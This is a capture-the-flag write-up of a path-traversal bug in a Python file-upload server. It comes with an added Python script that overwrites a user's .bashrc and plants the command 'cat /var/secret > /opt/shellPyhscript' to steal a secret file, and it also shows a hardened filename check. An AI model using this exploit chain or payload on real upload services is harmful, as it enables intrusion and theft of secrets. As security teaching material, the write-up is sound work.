Whitehatvn Grandprix CTF - Web01 writeup

This weekend we participated in Whitehatvn Grandprix CTF and this is one of the 2 real challenges we managed to solve.
Big thanks to @anon3236228 for executing the exploit while the challenge was officially down,
getting us the flag quicker (and for helping with the brainstorming).

Description:
manhndd is running a service file upload at
web01.grandprix.whitehatvn.com,
it is restored every 2 minutes. Every 1 minute after service starts, he ssh into server to check /var/secret. Can you get it?

Writeup:

After visiting the provided website we are presented with an upload page running SimpleHttpServerWithUpload.py; it didn’t ask for any particular file type and didn’t check the extension.
I saw other players trying to upload various shells without success, so I decided to inspect the upload functionality more closely.

I used Burp Repeater, which is a nice tool for quickly changing your requests and getting the results back.
After uploading a test file we are presented with the following message:

(screenshot: burp-web01-2)

So we know our files are saved in the /opt directory. I tried to go one directory up by modifying the filename parameter to “/../test”,
which resulted in “Couldn’t save file, are you sure you have right permissions?”, which means the upload is vulnerable to directory traversal! But we can’t write just anywhere, so the first thing I tried was writing to /tmp:

(screenshot: burp-web01-3)

Great, but not very useful; we can’t even read the file we uploaded :frowning:. I unsuccessfully tried to write a cron file, and even had crazy
ideas about exploiting the service by writing to something in /proc/self/, but it resulted in nothing. Then I reread the description:

**manhndd** is running a service file upload at...Every 1 minute after service starts, **he ssh into server**...

Of course! It should be possible to write to this user’s home directory and overwrite his .bashrc file, which is executed every time he logs in.
Test file first:

(screenshot: burp-web01-4)

Awesome, the write was successful, but how to get the flag out? After a few attempts with netcat we realized outbound connections were blocked,
so we decided to write to /opt, which we seemed to have access to:

(screenshot: finalscreenshot-web01)

And it worked! The flag could be found at web01.grandprix.whitehatvn.com/shellPyhscript :smiley:

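The chain from the writeup, written out as an added example; this is not code from the original post, from the CTF organisers, or from the SimpleHttpServerWithUpload.py script itself. It assumes the challenge's upload handler behaves like the widely circulated SimpleHTTPServerWithUpload.py gist, which pulls the filename straight out of the Content-Disposition header and hands it to os.path.join. That is the whole bug: os.path.join throws away every component before an absolute one, so a filename of "/tmp/test" replaces /opt entirely, and ".." segments are resolved by the kernel at open() time. The home directory /home/manhndd, the .bashrc payload text and the multipart boundary are assumptions made here. One caveat on the .bashrc trick: bash reads ~/.bashrc for interactive non-login shells, while an ssh session with no command gives an interactive login shell; that still works on Debian-family defaults because ~/.profile sources ~/.bashrc, but on a box whose ~/.profile or ~/.bash_profile does not, you would target that file instead. The last function shows the check the server should have had.

```python
"""Reproduce the upload traversal from the writeup and show the fix.

Assumptions (not from the page): the server parses uploads like the
SimpleHTTPServerWithUpload.py gist (filename taken verbatim from
Content-Disposition and passed to os.path.join); manhndd's home is
/home/manhndd; the .bashrc payload text and the boundary are made up here.
"""
import os
import re
import urllib.request

UPLOAD_DIR = "/opt"                              # where the challenge stored uploads (writeup)
TARGET = "http://web01.grandprix.whitehatvn.com/"
BASHRC_PATH = "/home/manhndd/.bashrc"            # assumption: the user's home directory
DROP_PATH = "/opt/shellPyhscript"                # fetched back over HTTP at the end of the writeup
BOUNDARY = "----demoBoundary7MA4YWxkTrZu0gW"      # arbitrary boundary, made up here

# Assumed .bashrc payload: when manhndd's shell starts, copy the secret into
# the upload directory so the web server hands it back to us.
BASHRC_PAYLOAD = f"cat /var/secret > {DROP_PATH}\nchmod 644 {DROP_PATH}\n"

# Same shape of regex the reference gist uses to pull the filename out of the
# multipart body: it accepts anything, slashes and dots included.
FILENAME_RE = re.compile(rb'Content-Disposition.*name="file"; filename="(.*)"')


def build_upload_body(filename: str, data: bytes, boundary: str = BOUNDARY) -> bytes:
    """Build the multipart/form-data body the upload handler expects.

    The client-controlled filename goes verbatim into Content-Disposition,
    which is the injection point for the traversal.
    """
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail


def extract_filename(body: bytes) -> str:
    """Recover the filename the way the server does: no sanitisation at all."""
    match = FILENAME_RE.search(body)
    if match is None:
        raise ValueError("no filename field in body")
    return match.group(1).decode()


def vulnerable_save_path(upload_dir: str, client_filename: str) -> str:
    """Where the unpatched handler ends up writing.

    os.path.join discards every component before an absolute one, so
    "/tmp/test" replaces upload_dir completely; normpath here mirrors what
    the kernel does with ".." when the file is opened.
    """
    return os.path.normpath(os.path.join(upload_dir, client_filename))


def safe_save_path(upload_dir: str, client_filename: str) -> str:
    """Hardened replacement: keep only the final path component and verify
    the resolved destination still sits under upload_dir."""
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("refusing empty or dot-only filename")
    base = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, dest]) != base:
        raise ValueError("filename escapes upload directory")
    return dest


def upload(url: str, filename: str, data: bytes) -> bytes:
    """Send one upload with a chosen filename (network call, not run on import)."""
    body = build_upload_body(filename, data)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={BOUNDARY}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


if __name__ == "__main__":
    # Sequence from the writeup: plant .bashrc, wait for the ssh login,
    # then fetch the copied secret from the upload directory over HTTP.
    print(upload(TARGET, BASHRC_PATH, BASHRC_PAYLOAD.encode()).decode(errors="replace"))
    print("now wait for manhndd to log in, then GET", TARGET + "shellPyhscript")
```

The useful comparison is vulnerable_save_path against safe_save_path on the same input: with the former, "/home/manhndd/.bashrc" is written exactly where the attacker asked, while the latter reduces it to "/opt/.bashrc", a harmless file in the upload directory. Note that "/../test" also lands in "/", which is why the writeup saw a permission error rather than a success message for that first probe.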

Nice writeup… kudos to you. Nice use of already existing tools. :slight_smile:

